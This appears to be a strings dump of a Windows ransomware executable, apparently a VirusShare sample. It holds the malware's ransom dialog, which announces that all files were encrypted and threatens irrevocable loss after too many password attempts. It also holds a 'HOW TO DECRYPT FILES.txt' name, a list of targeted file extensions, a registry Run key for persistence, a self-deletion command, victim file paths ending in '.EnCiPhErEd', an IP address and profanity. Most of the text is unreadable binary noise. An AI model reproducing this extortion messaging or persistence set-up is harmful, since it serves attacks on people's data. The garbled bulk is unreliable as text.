!This program cannot be run in DOS mode.
.text
`.rdata
@.data
.rsrc
hPR@
hPR@
hC@@
h^@@
hae@
5Qe@
hVu@
hNu@
hFu@
5Qe@
5Qe@
1_Y%
h-@@
h!@@
hVu@
hNu@
hFu@
=-u@
h4B@
hA@@
hPP@
h2@@
hPP@
5!u@
hPP@
:\*.
YXI}
=-u@
hw@@
Kj@h
hw@@
=-u@
PhPD@
Ph2@@
Ph4@@
hPD@
-PD@
PhPD@
hPD@
\*.*
\*.*
PhC@@
Ph^@@
hPD@
-PD@
hPD@
ShPD@
=Pe@
hPP@
hPD@
QWhPD@
hPD@
hPI@
=Pe@
u0hPD@
hP[@
h2@@
hP[@
5!u@
hP[@
=Pe@
hPD@
hP[@
hP[@
hPD@
hP[@
hPI@
5Qe@
5Qe@
h>u@
h6u@
h.u@
5Qe@
5Qe@
h]e@
5Ye@
5Qe@
=]e@
hPI@
=,u@
=Pe@
5Qe@
hae@
5]e@
5Ye@
5Qe@
h>u@
h6u@
h.u@
5Qe@
5Qe@
hP[@
hPI@
5Ye@
5Ye@
5Ye@
5^w@
5fw@
5bw@
hOA@
=%u@
hee@
hue@
hee@
hee@
hue@
hue@
hee@
hee@
hue@
=%u@
h~w@
5zw@
h&D@
5zw@
j2j2h
h)D@
5zw@
hKD@
5zw@
j2j2h
h-D@
j2j2h
h3D@
5zw@
5fw@
h8D@
5fw@
h=D@
5fw@
hDD@
5!u@
Wh)u@
Wh%u@
ComSpec
/c del "
" >> NUL
hM!@
hU!@
hPT@
h^!@
5!u@
hPN@
hPN@
hPY@
hPT@
hPY@
h<@@
hPY@
hPY@
hPT@
@hPY@
hVu@
hNu@
hFu@
5Qe@
5Qe@
=)u@
hPY@
:\*.
YXI}
5Ye@
h2@@
5!u@
hKD@
hKD@
hPY@
hPY@
hKD@
hPY@
hPY@
hKD@
hyC@
h^u@
h^u@
h^u@
h^u@
hVu@
hNu@
hFu@
%01@
%,1@
%(1@
%$1@
% 1@
%@0@
%D0@
%H0@
%L0@
%P0@
%T0@
%X0@
%\0@
%`0@
%d0@
%h0@
%l0@
%p0@
%t0@
%x0@
%|0@
%<0@
%$0@
% 0@
%40@
%,0@
xp7v&
BeginPaint
CreateWindowExA
DefWindowProcA
DispatchMessageA
EndPaint
GetDlgItemTextA
GetMessageA
GetSystemMetrics
LoadCursorA
MessageBoxA
PeekMessageA
RegisterClassExA
SendMessageA
SystemParametersInfoA
TranslateMessage
UpdateWindow
user32.dll
CloseHandle
CopyFileA
CreateFileA
ExitProcess
FindClose
FindFirstFileA
FindNextFileA
FindResourceA
FreeResource
GetCommandLineA
GetEnvironmentVariableA
GetFileAttributesA
GetFileSize
GetFileTime
GetLogicalDrives
GetModuleFileNameA
GetModuleHandleA
GetProcessHeap
GetTempPathA
GetWindowsDirectoryA
GlobalFree
HeapAlloc
LoadResource
LockResource
MoveFileA
ReadFile
RtlMoveMemory
SetErrorMode
SetFilePointer
SetFileTime
SizeofResource
WriteFile
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrlenA
kernel32.dll
SHGetSpecialFolderPathA
ShellExecuteA
shell32.dll
CryptAcquireContextA
CryptCreateHash
CryptDestroyHash
CryptGetHashParam
CryptHashData
CryptReleaseContext
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegSetValueExA
advapi32.dll
PathAddBackslashA
PathFindExtensionA
PathFindFileNameA
PathMatchSpecA
shlwapi.dll
CreateFontIndirectA
gdi32.dll
InitCommonControls
comctl32.dll
0p3nSOurc3 X0r157, motherfucker!
pussylicker
.bmp
open
.exe
.txt
HOW TO DECRYPT FILES.txt
Files have been decrypted successfully!
Error!
Password is incorrect!
Attention! All your files were encrypted!
To decrypt files, please enter correct password!
You have reached a limit of attempts - your data is irrevocably broken.
 OK 
Entered password is correct. Press OK to start decrypting of files. Dont close window and wait until message "Files have been decrypted successfully!" appears.
REG_SZ
\DefaultIcon
\shell\open\command
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Alcmeter
explorer.exe
CRYPTED!
Attention!
Info
Tahoma
Password:
Exit
EDIT
STATIC
BUTTON
C:\Users\tivy\Documents\dispassionately\agone\
et.ps
i.html
agues Under the Sea\art
ct-fr.oxtproperties
flag_16.bmp
er_strings.pyc
b.xml
2.tmp\addons.xcu
s.xcu
at-map\README.markdown
roperty\README.md
.txt.EnCiPhErEd
C:\Users\tivy\Documents\dispassionately\advertently\ovoli.html
no_packages\svdmcu.tmp_\dict-fr.oxt\ui\french_flag_16.bmp
_fr.txt
readme.md
e-expansion\README.md
es\balanced-match\README.md
es\is-property\README.md
i.txt
C:\Users\tivy\AppData\Local\Temp\
C:\Users\tivy\Desktop\VirusShare_5c163ae67a1ca838fed2a2b66048db06.exe
C:\Users\tivy\AppData\Local\Temp\YF6kL11GD7aVr16.exe
C:\Users\tivy\Documents\dispassionately\advertently\ovoli.html.EnCiPhErEd
\svdmcu.tmp_\dict-fr.oxt\ui\french_flag_16.bmp.EnCiPhErEd
iPhErEd
nCiPhErEd
\README.md.EnCiPhErEd
-match\README.md.EnCiPhErEd
rty\README.md.EnCiPhErEd
hErEd
-ir 
GYSRCXWMFRFSUPU\shell\open\command
\Yri-
YF6kL11GD7aVr16
GYSRCXWMFRFSUPU
C:\Users\tivy\Documents\dispassionately\agone\
.txt
er the Sea\
.txt
.txt
.txt
.txt
.txt
.txt
.txt
.txt
C:\Windows\explorer.exe
JFIF
1299105403, 193.200.150.125
$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=
=)#)==================================================
$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
	#3R
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
g<L?
V<Yf
,;{S
L>!@
_Y96
V!ZiZ
68=*
HdW 
@r84
2,QKF(
<_CY
+[U\
_CT6S
Qk`{S
[f:O/
s)l@
:T_c
qP 4
S3R#eh
O2dT$
^OJ.+
C&zS
yuke!J
cJ*G
',p)^6
5f<b
?)Xr)
%)6P
Qkun
qHe1
N+HF=)
c4'52
Z?QX
GnkS
%)6P
=)4;
FiRC
DF*)
85'^
O5(j
F*LT
^jv:x
5rm'P
Mrzm
m+FdX
f:iJ
qYrF
v3yo
XqZ~
f+'_
<_om5
`2~l
-cYy
F6^g
R-RH
VO`28
hZa$w
;DGj
iQYjz
MZsu/
g~,g
-o|?
{e1H
i;+[
nm~V
{xfY
&rHc
Mgg?
~uv	
4MZybr
QYid
u=E4
-9ow
wKe,
\NeD{
oJtZ%
u7FM
w*`;n=N3
Z]_F
DeZ:
aw{m
P>`z
sNqim
gP	-
K[kj\
&]AA
>e_,~
b,cG
kczZ
)p!H
k-#\
<.pF:
KRVB3
"gPG
F#V-
B!6rZ
NYrRQ
}/_:t
`XlJ
:T_gpk
{>zQ`
.)qK
Caeqw4
cosg
-?3?
<Y4S
K]^H
)nLV
}*^*
wq@q
y5?r1
jIXf
U%OP
k;Mz(
oP8o
KAw3@T@d	
q*`J
MD]^
4=_S
@@E=
b+;Al
me^x
O\}}
E(R@ 
V[}"
{i$q
W&9Myr
#YBnb
2A88
cjZe
j(nH
>r=E
zRC	T
iWNx
PEij7
r9`8
Ew}:
[8t[k+{&
?"(vH
(@ *
ug1H
JVg7
\s<\"
$u3x
;]OG
 }MW
<sX>
5ydX
+E|=
02wFr
)+$)W
GtzF
&>\v
<Wio}=
QG%N
c9c1<
zu4{(^
.t$O-
):qk
X_K%
yrK-
Jm:k
i5)$*
li,ey'
]Awc
<*dGR2
M\7#O
s^}7
 '9!pq
mi=.
M(^Oi
uwy?
G=Mbh>(
5->{
'$( 
rN0p>
i:P{
O]xk";
ZM{M
	m,n
,y;q
VP#D
C4zu
{(v+
{	^kx
('pnF
qL)M)O
YCFT
TtF5kT
Ou6L
@xmo
l7>Z
hZ,	
qx|=):
|7uw
o&-BD
^5`	
MF!-
V.<s
nR~N
0*.-
:VqAI
KM7n
_2c;
$.{b
K{ql#
Aerbm
,?f1
5:|N
*2RM=
Xxr	,
-kWP
u;]/P
)JWO
TU9S
<J.Qn	
~}g\
{bH\
Gwt&
ua5Kkyl
d}sS
tifc
p8@1
[Guu
ei<R4
,a[hf
@$c?
%NpT
W5m{P
ooAL
@?A].
p?{,qmw
evl#
gX%f%L
oc!r
ml^-1
]e/$
aC$g
[TnJ
6[{)
eW$m
Zwo]v
kc_C'
b`.:7
lUL?5
{;lp
 3J"
V4y:T
f K4
5wZ6+
0YppW-
6W,r
G3x/
Cm>`7n
w )&
^+ue
;dqZ
	ss$O;n'w
psKc
bDbO
ksa(
4-CU;d
*Pm5{
DXg)
KYP2/
<zVu
ZZOUm
u2/>
*n.mj
;I%y#
uyo"
|0!p:
[BY@
NF1[
M|ZE
6KMG
QNrQ
rd/W
]FmK
W/tm4
,C{.
[k6h
>c]f
Iy=U
x[Xh
`MFo
`?J_Y
EQ7o
{yiu
 }MZ
?49.W
@~RGS
v`p	
TrxV
Z+Kc
&"rm
+c;X
/<{w=
s$b?1
6Rkv2
<qG<{
{Kk]2
me?gI
\cfzw
`nwg
qG<w
w7={
U$i"A)
|?+8
=kKV
Ut]?WfYa
/|Qb!'
HT c
$kyp 
tjB*S
zH|y
.']sLhm
2kZb
pBA(
Y!i2$
!Su9
Ue}WM
r_98
gE,m
Lq]m
 O'=y
"Ta6
f;\X
Wd=A=j8
lW67
Kko/CF
77Tt[
jz;4H
Ioqcz
Rq[0e
8&7U
+m*+]
 -.s
M_sZ
*2NGrkf
:Ymf
MBM>
ZsspI
Vm6%
?CIa
TStS^v
Qikm
dmCz
&	.P
f|wU
F$fa
ErA'
n5-cJ
YsI5
a ET
;#\`py
2e~n
[f--
O!FX
W:JO
=Fr1Y
xwVo
g|yj>
	Uc"
A;qW
Xr(Xx
:m-R_
N)-v
s<Mm
),W>
;V.28=GS
R)}Z6
W7.Ug}5
TV>R
O%Af8
_O6R
=i,4U
Ys^+[
<v=9
IBga
U-BH
h[.$?J
Ev~d
>RH-
,.u)
aE+n
OPkNo
\Imx
4qZ&
g{:y
g]i:
pCc=
*]+X
M\eQO
4RD6
2:dRj
ZhF}V
moMNVO
,5	4
[MWF
`_/n3
46z&
g{*2/
K	%,
LMgv
;k]f=
F|zg
{XV8
Gp[9 c
bD(@enNq
}aR]z
=_Kq"
K(<F8
kkyo{=
$;8<
zT9V
U*s^
7g+.[
*FzV
43;J
W/yi
	<73[
H!F<p
;xns
Im$(
5]*8,
ku}z]
\k&;
	=28
Mwks
zzWc
0]GBW
^jJ.B
u'<VN
<*Yb
1f<aX
n*y[
	7VG
<dg#
gvR1
%Y/u
 k//<
_HPM
e9?7$
<kj't
O<(8-
-$0,
o}WM
%0ya
7<Z`
56YN%
MYmJ
s !Y
V..Kda<
om=n
.<3h
mlt;yc1
UEkt
,F__
][^]Av
3X}B
EKNn
ax_B
Yp0rr:
11NI]$
i{x^
mum3
Zmt2
4+E]Y
)i{Z
~@`1
HukM"
3ysJ
=Fk!waf
0xTU#
\DP2
f]ykxm
o+8$
34M#
`F7I
YOpk
EDPO$
_PpjU
q3MJ{
?>+t7(
nK4TS
s"Gl
.&mZ
8{8J
OUfv
{\E2
tV];
g=Gz
YVHX
ifm!
kxoY:
22p3
MEiOO
5	-Y
`}Ec]jO
hbm%
H[MVkV
## z
|sZZ~
4:Pn
cO:E
*P[ 
s4:0{
REyu
$*4x
o#z)5
([8n
8bN8
T\WPx
Tm<i
=}*;8
bg7>n
Y[W}
(!~f
Yo<F$
_b:VF
c*kk
2	6y
7'wn
um;Z
u+"0M
9'q#
,sF$
{6;Q
eI&7k
i^.S
Kpc(
\F?F
>+GWo
U.&+
Y./$I
|iie
qp&w
[Kb&
[Ov:k
ihmt
'+ ]
X2V5
UR3qQ_
j-:.T
oui{Z
gv1q
6^r:
:tzG
no,t
dXAy=
iJv;s
%t,[fN
$8U_M
DCG,
hTj[W
C}a<
STmZ=&
[_jv
j:AV
j}&;
]9bK
u"q+*2}
pNr;
k7	yi
[+=oO{M
4Q[]
{3eo
9*T/
(][nX
F`Ip[
qW(M
18XV
$qU*
'	B3
gx]+]r
-_Kk
tW='
)?w 
Gkgy
[=3M
WW`I
TjTQI
e}ROO-
Nl|1
h,@,2
ewgu
%:J5i
\/=:
2^HD
\x_U
,~_)'
o5+Yn
b>ePG#4
Z|/d
[Kpb
&-fI
;x4gYV
m\F|G
oer&9
=29'<
F1VM+
o`9?
7wq)
}k	WQ
K+u(*
Gk$){
(4}ei
t}Ba
mTYY
y$/&Q
!bR2
SOwT
'kns
W[y}
Y%I/vi
^[FHU
*KNoz
|Cc<
Kmu5
k;wI
DS{(
V4im
*=oQ
Nu)a
QMbSiX
([[mK
mFx<
+{A 
oE}/e
}O">
mkyo
int]J
yym]G_R+
\HB*
D2YI'
EzDZ
Oim}$
<Cc	
hOkko%
'<fB>_A
kMoOh
lP;/
ww<z
auk,
3Vt4k
DAw{gP
2[DV2
vG"r
bxZ?1{
B0	a
Aa]*
NcBDg
bRm[cjy$
8P=s
+ge#8
La!r
wm9o
M~[Kk
VH[l
D`	<
xo][
Q,kxg,
\318
>Koj
ZIn'
/ =Ae
dp}j
8%A9#
Q$PF@ 
j-	7
VOt9
"8R2	Rr2
k$7rE
byj|Vz
kwfb
Fk+e
a6Qm-
M,q8F	#Oa
8KAj
(n=E
6e~Q
F22;
!1\j
[$}+G
G)o=
uMCR
7%o~
c[!b}s
<H.bCwm
{wpH
Y9;X
*/n4
#5z?
W~&KK+;?
VRK1
#~fTk
X~'k
zc|:
:9|9syu
>_se
V9gv,
((_c
cgld
5?VW
mB^[^
ddFy
+gNQ
8[|2(
*aqylY
n_7/
$gy,
Myi,F4
~OUm;
mi$^^
1%l.o.d
#{a-
.c{x
Ht}a
J%eyX
Y[Ek
AgtR
K;c$
,Fs)
</yw
IffE>
g)JR
!|}3W
R#}u
mu=/J
nln/t
,FI$
:\ze
~O'=0:s
l2JT
6L.!k
v1H:
}[K_@y
hu-)
lna3d
i/=v
EwE2}
qX+o-
[Rk3o
VI+[
]4$b
WZB3
7m$LP
eQ`#
M<K?
{ue7
 ?09
K}O'
wpkeJ
[6~ 
jcG@
*[Zk
X,5\3
!]'J
0y"59
UCm;A
m\]#
I*:rzf
?2j;
/ve72
apUBn
MFmv/
MtWC
/0[[
(uk[H
{o$P
#<~5
8%I' g<
{Suj
t_ii{
=6"o
+/-]~f
!Q9>]4
I3M3
-?T7
Oigk
zhu,
;Tu'
3n4k{
*5{6vs
p9=zTZV
I9;G
_.{N
yNcK
u}zM
^ppr
0G^s
)ZiU
8,FG
/lVX
jVE|
x4Kq5
cWx^
iie}
]hM\
u(>o
F#!x
UI$.p=O
 fPETK
(Y$\rc~k<]
"Uw!
8Qz`
<;tLr-
oye<
a?!S
dy%A
"{tl
g'5f
DXgk
msoz
cPN2p;
pNzU
abPqT~
sHb>
<8<V
)(9Ph
Iiu5
x$Yco
&xSMkyW
P,x-
r	3v
2izu
f)1Rb
OB)6)$
1PEr
ET``
EBF:
|Aqj
EV,c\
B&U0
sUVJ
P]ib
b0M>
y4y5cm.
D1LH
[0{UW
S@~s
r]HX
	ZiZ
W{Oj
ZK?j
lrzWe-
KIK@
"+M)R
O)})
"_JxP(
ZQIE
Usm4
R1{S
S1Ryx
E)6P
/@O4
ii)h
Z))h
LQKE
\Q@	KE
FGR*
G=;U
\Yri-
*.zip
*.rar
*.7z
*.tar
*.gzip
*.jpg
*.jpeg
*.psd
*.cdr
*.dwg
*.max
*.bmp
*.gif
*.png
*.doc
*.docx
*.xls
*.xlsx
*.ppt
*.pptx
*.txt
*.pdf
*.djvu
*.htm
*.html
*.mdb
*.cer
*.p12
*.pfx
*.kwm
*.pwm
*.1cd
*.md
*.mdf
*.dbf
*.odt
*.vob
*.ifo
*.lnk
*.torrent
*.mov
*.m2v
*.3gp
*.mpeg
*.mpg
*.flv
*.avi
*.mp4
*.wmv
*.divx
*.mkv
*.mp3
*.wav
*.flac
*.ape
*.wma
*.ac3
*.ico
 www.mbrlocked.jimdo.com 
EnCiPhErEd
YF6kL11GD7aVr16
GYSRCXWMFRFSUPU
?"	?
PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
